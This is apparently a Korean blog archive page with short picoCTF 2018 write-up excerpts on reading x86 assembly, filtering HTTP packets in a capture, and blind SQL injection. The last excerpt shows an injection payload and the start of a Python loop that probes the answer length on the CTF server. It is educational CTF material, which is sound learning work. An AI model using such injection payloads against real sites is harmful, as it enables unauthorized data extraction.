2018/10 썸네일형 리스트형 [picoCTF] assembly-0 이 문제는 어셈블리어를 얼마나 이해를 하느냐를 묻는 문제이다. intel_syntax noprefix.bits 32.global asm0asm0:push ebpmov ebp,espmov eax,DWORD PTR [ebp+0x8]mov ebx,DWORD PTR [ebp+0xc]mov eax,ebxmov esp,ebppop ebpret ebp + 0x8 = argv[1]ebp + 0xc = argv[2] mov eax, ebx로 ebx 값을 eax에 넣는것을 볼 수 있다. eax는 리턴값이다. 더보기 [picoCTF] admin panel 이 문제는 포렌식 문제로서 패킷을 분석하는 문제이다.허나 문제에서 트래픽을 캡쳐했고 어드민 패널에 로그인을 한 패킷이라고 한다.그렇다면 http 프로토콜로 찾으면 쉽게 필터를 할 수 있을 것이라 추측하였다. 수 많은 패킷 중에서 유일하게 통신하는 것들만 남았다. POST 메소드로 login에 패킷을 쏜것을 발견할 수 있다. 플래그를 얻을 수 있었다. 더보기 [picoCTF] A Simple Question 이 문제는 blind injection 기법으로 answer의 값을 가져와 인증을 하면 되는 문제이다. 먼저 길이는 아래의 쿼리로 가져올 수 있다. a' or length(answer)=5 -- - 코드를 작성하여 편하게 가져왔다. import requestsimport jsonlength = 0url = 'http://2018shell3.picoctf.com:2644/answer2.php';headers = {'User-Agent': 'Mozilla/5.0'}for i in range(1, 50):param = {'answer' : "a' or length(answer)=" + str(i) + " -- -", 'debug':0}rs = requests.post(url, data=param ,header.. 더보기 이전 1 다음